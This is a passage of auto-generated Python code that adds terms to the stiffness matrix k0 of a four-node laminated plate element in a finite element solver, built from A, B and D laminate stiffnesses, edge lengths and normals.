k0[i2*dof+1, i4*dof+4] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+3, i1*dof+0] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+3, i1*dof+1] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+3, i1*dof+3] += Ac*((D11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+3, i1*dof+4] += Ac*((D12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+3, i2*dof+0] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+3, i2*dof+1] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+3, i2*dof+3] += Ac*((D11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+3, i2*dof+4] += Ac*((D12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+3, i3*dof+0] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+3, i3*dof+1] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+3, i3*dof+3] += Ac*((D11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+3, i3*dof+4] += Ac*((D12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+3, i4*dof+0] += Ac*((B11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+3, i4*dof+1] += Ac*((B12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + B66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+3, i4*dof+3] += Ac*((D11*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D16*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+3, i4*dof+4] += Ac*((D12*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + D66*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+4, i1*dof+0] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+4, i1*dof+1] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+4, i1*dof+3] += Ac*((D12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i2*dof+4, i1*dof+4] += Ac*((D22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i2*dof+4, i2*dof+0] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+4, i2*dof+1] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+4, i2*dof+3] += Ac*((D12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i2*dof+4, i2*dof+4] += Ac*((D22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i2*dof+4, i3*dof+0] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+4, i3*dof+1] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+4, i3*dof+3] += Ac*((D12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i2*dof+4, i3*dof+4] += Ac*((D22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i2*dof+4, i4*dof+0] += Ac*((B12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+4, i4*dof+1] += Ac*((B22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + B66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i2*dof+4, i4*dof+3] += Ac*((D12*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D16*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i2*dof+4, i4*dof+4] += Ac*((D22*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D26*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D26*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + D66*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+0, i1*dof+0] += Ac*((A11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+0, i1*dof+1] += Ac*((A12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+0, i1*dof+3] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+0, i1*dof+4] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+0, i2*dof+0] += Ac*((A11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+0, i2*dof+1] += Ac*((A12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+0, i2*dof+3] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+0, i2*dof+4] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+0, i3*dof+0] += Ac*((A11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+0, i3*dof+1] += Ac*((A12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+0, i3*dof+3] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
